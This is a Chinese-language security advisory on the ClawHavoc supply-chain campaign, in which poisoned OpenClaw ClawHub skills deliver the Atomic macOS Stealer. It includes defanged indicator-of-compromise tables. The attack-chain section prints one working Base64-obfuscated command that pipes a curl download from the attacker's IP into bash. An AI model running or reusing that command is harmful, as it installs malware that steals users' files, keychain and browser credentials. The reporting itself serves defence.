OpenClaw供应链攻击事件
快速发展的开源AI Agent平台OpenClaw正面临严重的供应链风险,攻击者已在其ClawHub插件市场投放恶意"技能"模块。安全公司SlowMist和Koi Security发现数百个遭篡改的扩展程序正在传播Atomic Stealer等信息窃取程序。
OpenClaw允许本地AI Agent通过ClawHub托管的"技能"模块扩展实现工作流自动化、服务交互和设备控制。这些技能遵循AgentSkills规范,主要以包含可执行指令的SKILL.md文件夹形式存在,而非可审计的代码。这种设计将Markdown从文档转变为操作入口点,极易被滥用。
ClawHub宽松的上传流程缺乏严格审核,其漏洞模式与npm或VS Code市场类似。该平台近期用户激增,同时吸引了开发者和攻击者。Koi Security扫描了2,857个ClawHub技能,发现341个恶意样本,感染率达12%,该行动被命名为ClawHavoc。SlowMist整合了400多个样本的IOC指标,确认472个受影响技能共享基础设施。
恶意技能特征
恶意技能主要集中在加密货币工具(如Solana追踪器、Phantom钱包)、YouTube实用程序、Polymarket机器人以及"clawhub1"等仿冒名称。它们伪装成更新程序、安全检查或财务工具以规避检测。
攻击链分析
攻击者在SKILL.md的"前提条件"中嵌入两阶段载荷。用户执行Base64混淆的命令(如echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC83YnV1MjRseThtMXRuOG00KSI=' | base64 -D | bash)会触发curl | bash下载。
第一阶段投放器从91.92.242.30等IP获取脚本,随后下载第二阶段二进制文件(如x5ki60w1ih838sp7)。根据SlowMist分析,这些临时签名的Mach-O通用文件与Atomic macOS Stealer(AMOS)匹配,会窃取桌面/文档数据,通过socifiapp.com等C2服务器外传,并盗取钥匙串和浏览器凭证。
动态分析显示,攻击者会弹出密码钓鱼对话框,将.txt/.pdf文件打包为ZIP,并通过curl上传。域名/IP的重复使用(如91.92.242.30与Poseidon勒索组织关联)表明这是有组织的行动。
一个流行的"X(Twitter)趋势"技能隐藏了仿冒配置输出的Base64后门。解码后会从91.92.242.30/q0c7ew2ro8l2cfqp下载针对macOS文件夹的窃取程序dyrtvwjfveyxjf23。这种方法可规避关键词扫描并实现载荷快速替换。
威胁指标(IOC)
域名IOC
| 类型 | 指标 |
|---|---|
| 域名 | socifiapp[.]com |
| 域名 | rentry[.]co |
| 域名 | install[.]app-distribution.net |
URL IOC
| 类型 | 指标 |
|---|---|
| URL | hxxp[:]//91.92.242.30/7buu24ly8m1tn8m4 |
| URL | hxxp[:]//91.92.242.30/x5ki60w1ih838sp7 |
| URL | hxxp[:]//91.92.242.30/528n21ktxu08pmer |
| URL | hxxp[:]//91.92.242.30/66hfqv0uye23dkt2 |
| URL | hxxp[:]//91.92.242.30/6x8c0trkp4l9uugo |
| URL | hxxp[:]//91.92.242.30/dx2w5j5bka6qkwxi |
| URL | hxxp[:]//54.91.154.110:13338/ |
| URL | hxxp[:]//91.92.242.30/6wioz8285kcbax6v |
| URL | hxxp[:]//91.92.242.30/1v07y9e1m6v7thl6 |
| URL | hxxp[:]//91.92.242.30/q0c7ew2ro8l2cfqp |
| URL | hxxp[:]//91.92.242.30/dyrtvwjfveyxjf23 |
| URL | hxxps[:]//rentry.co/openclaw-core |
| URL | hxxps[:]//glot.io/snippets/hfdxv8uyaf |
| URL | hxxp[:]//92.92.242.30/7buu24ly8m1tn8m4 |
| URL | hxxp[:]//95.92.242.30/7buu24ly8m1tn8m4 |
| URL | hxxps[:]//install.app-distribution.net/setup/ |
| URL | hxxp[:]//11.92.242.30/7buu24ly8m1tn8m4 |
| URL | hxxp[:]//202.161.50.59/7buu24ly8m1tn8m4 |
| URL | hxxp[:]//96.92.242.30/7buu24ly8m1tn8m4 |
| URL | hxxps[:]//glot.io/snippets/hfd3x9ueu5 |
IP IOC
| 类型 | 指标 |
|---|---|
| IP | 91.92.242[.]30 |
| IP | 104.18.38[.]233 |
| IP | 95.92.242[.]30 |
| IP | 54.91.154[.]110 |
| IP | 92.92.242[.]30 |
| IP | 11.92.242[.]30 |
| IP | 202.161.50[.]59 |
| IP | 96.92.242[.]30 |
文件IOC
| 类型 | 文件名 | SHA256 |
|---|---|---|
| 文件 | dyrtvwjfveyxjf23 | 30f97ae88f8861eeadeb54854d47078724e52e2ef36dd847180663b7f5763168 |
| 文件 | 66hfqv0uye23dkt2 | 0e52566ccff4830e30ef45d2ad804eefba4ffe42062919398bf1334aab74dd65 |
| 文件 | x5ki60w1ih838sp7 | 1e6d4b0538558429422b71d1f4d724c8ce31be92d299df33a8339e32316e2298 |
| 文件 | dx2w5j5bka6qkwxi | 998c38b430097479b015a68d9435dc5b98684119739572a4dff11e085881187e |
| 文件 | openclaw-agent.exe | 17703b3d5e8e1fe69d6a6c78a240d8c84b32465fe62bed5610fb29335fe42283 |
参考来源:
OpenClaw Becomes New Target in Rising Wave of Supply Chain Poisoning Attacks
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf
客服小蜜蜂(微信:freebee1024)
